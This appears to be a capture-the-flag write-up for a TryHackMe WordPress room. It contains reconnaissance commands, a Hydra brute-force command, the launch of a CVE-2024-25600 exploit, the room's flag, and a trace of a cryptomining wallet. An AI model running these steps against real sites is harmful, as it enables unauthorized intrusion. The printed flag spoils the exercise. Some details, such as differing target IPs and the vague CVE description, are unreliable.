# Security Report: Vulnerability Analysis and Risks in the TryHack3m System
#### 1. Mapping the IP Address to a Hostname:
Add the target to /etc/hosts so it can be reached as bricks.thm:
> nano /etc/hosts
10.10.78.255 bricks.thm
***
#### 2. Port Scanning + Server and Version Detection
A scan was performed using Nmap to detect open ports and identify the listening services and their versions:
> nmap -Pn -sV -sC bricks.thm
Output:
Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-13 02:56 GMT
Nmap scan report for bricks.thm (10.10.239.153)
Host is up (0.0056s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
**22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)**
**80/tcp open http WebSockify Python/3.8.10**
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 405 Method Not Allowed
| Server: WebSockify Python/3.8.10
| Date: Thu, 13 Feb 2025 02:56:49 GMT
| Connection: close
| Content-Type: text/html;charset=utf-8
|_http-server-header: WebSockify Python/3.8.10
**443/tcp open ssl/ssl Apache httpd (SSL-only mode)**
**3306/tcp open mysql MySQL (unauthorized)**
MAC Address: 02:96:56:FD:74:27 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 83.90 seconds.
***
#### 3. Accessing the Web Server and Retrieving Information:
Accessing the HTTP server:
http://bricks.thm/
Error code: 405 (Method Not Allowed).
Accessing the HTTPS server:
https://bricks.thm/
Warning: "Potential Security Risk Ahead" - the browser rejects the SSL certificate as invalid, but the site can still be opened after accepting the warning.
***
#### 4. Hidden Page Scanning Using Gobuster:
> gobuster dir -u https://bricks.thm -w /usr/share/wordlists/dirb/common.txt -b 403,404 -k
Output:
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/0 (Status: 301) [Size: 0] [--> https://bricks.thm/0/]
/admin (Status: 302) [Size: 0] [--> https://bricks.thm/wp-admin/]
/atom (Status: 301) [Size: 0] [--> https://bricks.thm/feed/atom/]
/b (Status: 301) [Size: 0] [--> https://bricks.thm/2024/04/02/brick-by-brick/]
/B (Status: 301) [Size: 0] [--> https://bricks.thm/2024/04/02/brick-by-brick/]
...
/robots.txt (Status: 200) [Size: 67]
Finding: a robots.txt file was found; it lists paths that search engines are asked not to crawl.
***
#### 5. Investigating Hidden Web Pages:
https://bricks.thm/robots.txt:
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Note: admin-ajax.php does not provide additional information.
#### https://bricks.thm/wp-login.php - Login page.
***
#### 6. User Enumeration via the WordPress REST API:
Listing usernames through the REST API:
> curl -s https://bricks.thm/wp-json/wp/v2/users | jq
Output:
404 Not Found (access is blocked).
Enumerating users through the author parameter:
> curl -I https://bricks.thm/?author=1
Output:
Author: administrator
***
#### 7. Brute Force Attack Attempt:
Brute force attack using Hydra:
> hydra -l administrator -P /root/Tools/wordlists/rockyou.txt -t 64 -S bricks.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:F=Error"
Result: the attack failed; no valid password was found in the wordlist.
***
#### 8. Exploiting a System Vulnerability:
Identify the software and its version in order to find a matching vulnerability.
Examining the links in the page source, one of them was:
https://bricks.thm/comments/feed/
Opening the link downloaded a feed file containing the following generator tag:
`<generator>https://wordpress.org/?v=6.5</generator>`
A Google search revealed a vulnerability matching this service and version:
#### CVE-2024-25600
Running the exploit:
> python3 CVE-2024-25600.py -u https://bricks.thm/
Login successful!
***
### Flag Discovery:
#### 9. Attempting to Access the Hidden.txt File:
Access attempt via URL:
https://bricks.thm/hidden.txt
Output:
"Whoops, that page is gone".
Reading the file 650c844110baced87e1606453b93f22a.txt found on the server:
Shell> cat 650c844110baced87e1606453b93f22a.txt
THM{fl46_650c844110baced87e1606453b93f22a}
650c844110baced87e1606453b93f22a.txt contains the flag:
### THM{fl46_650c844110baced87e1606453b93f22a}
***
#### 10. Detecting a Suspicious Process:
Displaying active system services:
> systemctl | grep running
Output:
...
### ubuntu.service loaded active running TRYHACK3M - Suspicious process!
***
#### 11. Identifying the Suspicious Activity:
First, check the location of the suspicious service file:
> systemctl status ubuntu.service
Output:
ubuntu.service - TRYHACK3M
Loaded: loaded (/etc/systemd/system/ubuntu.service; enabled; vendor preset: enabled)
Active: active (running) since Tue 2025-03-04 21:32:23 UTC; 2min 16s ago
Main PID: 2669 (nm-inet-dialog)
...
***
#### 12. Finding the Log File Recording the Attacker's Actions:
Checking the directory where the suspicious service logs its actions:
> ls /lib/NetworkManager/
Output:
...
### inet.conf -> Log file
...
***
#### 13. Searching for the Wallet Address Used for Crypto Mining:
Accessing the log file and searching for the address:
> cat /lib/NetworkManager/inet.conf
Output:
...
#### Bitcoin wallet address obtained:
### bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa
A search for the "bc1" prefix confirmed it is a Bitcoin address (bc1 is the Bech32 prefix used by native SegWit addresses).
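To triage a log such as inet.conf without relying on a web search, the following added script (not part of the original report; the log lines around the address are constructed) extracts bc1 candidates with a regular expression and confirms that each one is a well-formed Bech32 address by recomputing the BIP-173 checksum:

```python
import re

# Constructed sample in the spirit of the inet.conf log from step 13: the first
# wallet is the one found in the report, the second is a deliberately corrupted
# copy (last character changed) that should fail the checksum.
SAMPLE_LOG = """\
2025-03-04 21:32:23 nm-inet-dialog started
2025-03-04 21:32:24 wallet=bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa
2025-03-04 21:32:25 wallet=bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qq
"""

CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"   # the 32 Bech32 symbols
CANDIDATE_RE = re.compile(r"\b(bc1[%s]{25,87})\b" % CHARSET, re.IGNORECASE)


def _polymod(values):
    """BIP-173 checksum polynomial over a list of 5-bit integers."""
    gen = (0x3B6A57B2, 0x26508E6D, 0x1EA119FA, 0x3D4233DD, 0x2A1462B3)
    chk = 1
    for v in values:
        top = chk >> 25
        chk = ((chk & 0x1FFFFFF) << 5) ^ v
        for i in range(5):
            if (top >> i) & 1:
                chk ^= gen[i]
    return chk


def bech32_valid(addr):
    """True if addr carries a correct Bech32 checksum (bc1q... addresses).
    Taproot bc1p... addresses use Bech32m, which needs a different constant."""
    if addr != addr.lower() and addr != addr.upper():
        return False                      # mixed case is forbidden by BIP-173
    addr = addr.lower()
    hrp, sep, data = addr.rpartition("1")
    if not sep or not hrp or len(data) < 6 or any(c not in CHARSET for c in data):
        return False
    hrp_expanded = [ord(c) >> 5 for c in hrp] + [0] + [ord(c) & 31 for c in hrp]
    return _polymod(hrp_expanded + [CHARSET.index(c) for c in data]) == 1


def find_wallets(text):
    """Return (address, checksum_ok) for every bc1 candidate found in text."""
    return [(m.group(1), bech32_valid(m.group(1))) for m in CANDIDATE_RE.finditer(text)]


if __name__ == "__main__":
    for addr, ok in find_wallets(SAMPLE_LOG):
        print(addr, "valid checksum" if ok else "INVALID checksum")
```

A candidate that matches the pattern but fails the checksum is most likely a truncated or mis-copied indicator rather than a real wallet.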
***
#### 14. Identifying the Attacking Group:
After identifying the cryptocurrency wallet address, we looked it up on a blockchain explorer (Blockchain.com):
https://www.blockchain.com/explorer/search?search=bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa
Entering the address in the search bar showed several large transactions from this wallet. One of the counterparty addresses had made multiple large transactions; looking it up, the first result was:
##### OFAC - United States Sanctions Affiliates of Russia-Based LockBit Ransomware Group
The page gave information about the individual associated with the address, "Ivan Gennadievich," and at the top of the page the LockBit group was named.
### The group name is : LockBit
***
### **Summary of Detected Vulnerabilities**
During the assessment, several critical security vulnerabilities were identified that could allow attackers to exploit the system for malicious purposes. Below is a detailed description of the detected vulnerabilities, their risks, and their potential impact.
---
### **1. CVE-2024-25600**
**What is the vulnerability?**
This vulnerability relates to a flaw in specific software that could enable **Remote Code Execution (RCE)**, **Privilege Escalation**, or **Information Disclosure**.
**Why is it dangerous?**
- Allows an attacker to execute malicious code within the system without authorization.
- Could lead to complete server takeover or exposure of sensitive data.
- May be exploited for additional attacks, such as malware installation or data theft.
**Potential impact:**
- Disruption of critical services.
- Compromise of user data and leakage of classified information.
- Use of the server as a base for further attacks (Botnet).
---
### **2. Expired SSL Certificate**
**What is the vulnerability?**
When an SSL certificate has expired or is otherwise invalid, the connection between users and the server is no longer properly authenticated: users cannot verify that they are talking to the genuine server, even though the traffic is still encrypted.
**Why is it dangerous?**
- Enables attackers to perform **Man-in-the-Middle (MITM)** attacks and intercept sensitive data.
- Users may receive browser warnings, damaging the website's credibility.
- Could lead to data breaches, including login credentials and financial information.
**Potential impact:**
- Leakage of user and payment information.
- Loss of user and customer trust.
- Business disruption due to blocked website access.
---
### **3. Digital Wallet Breach**
**What is the vulnerability?**
Attackers may exploit system or user-level weaknesses to **steal private keys** from digital wallets storing cryptocurrencies like Bitcoin and Ethereum.
**Why is it dangerous?**
- Allows an attacker to directly steal funds from the digital wallet.
- No way to recover funds in case of theft.
- These attacks are often conducted through phishing, malware, or system vulnerabilities.
**Potential impact:**
- Significant financial loss without recovery options.
- Damage to customer trust in the service or platform.
- Use of stolen wallets for criminal activities, such as money laundering.
---
### **4. Cryptojacking**
**What is the vulnerability?**
Attackers can exploit system resources (CPU/GPU) to mine cryptocurrency without the server owner's knowledge.
**Why is it dangerous?**
- Causes excessive hardware resource usage, potentially slowing down the system and affecting performance.
- Can result in high electricity costs and overuse of system resources.
- Exploits the system for an attacker's benefit without the server owner's consent.
**Potential impact:**
- Significant slowdown of services and potential server crashes.
- Increased electricity consumption and operational costs.
- Damage to server reliability and security.
---
## **Security Recommendations for the System/Server Owner**
### **1. System Updates and Security Patches**
- Install the latest security updates, including patches for CVE-2024-25600.
- Check for specific patches for vulnerable servers or applications.
### **2. SSL Certificate Renewal and Secure Communication**
- Issue and install a **new, valid SSL/TLS certificate** from a trusted certificate authority.
- Set up automatic renewal to prevent future issues.
- Ensure all communication is encrypted using **TLS 1.2 or TLS 1.3**.
### **3. Securing Digital Wallets**
- Use **hardware wallets** instead of only online wallets.
- Enable **Two-Factor Authentication (2FA)** for all crypto-related accounts.
- Avoid storing private keys in unsecured locations.
### **4. Detecting and Blocking Cryptojacking**
- Monitor **unusual CPU/GPU resource usage**.
- Implement firewall policies to block suspicious connections.
- Use **IDS/IPS systems** to detect and block malicious code.
### **5. Strengthening Server Security**
- Restrict server access to authorized users only.
- Change default passwords and use strong, complex passwords.
- Regularly review logs for suspicious activities.
### **6. Advanced Network Security**
- Implement a **firewall** to block unauthorized traffic.
- Use a **VPN** for remote access.
- Conduct **regular penetration testing** to identify vulnerabilities.
### **7. Threat Monitoring and Management**
- Install an **Intrusion Detection/Prevention System (IDS/IPS)** to detect and block intrusion attempts.
- Use **SIEM tools** to collect and analyze security logs.
- Set up **security alerts** for suspicious access or system anomalies.
---
### **Conclusion**
The identified vulnerabilities pose significant risks to the system and could lead to severe financial and operational damage. It is recommended to implement the suggested security measures as soon as possible to protect the server, data, and users from cyber threats.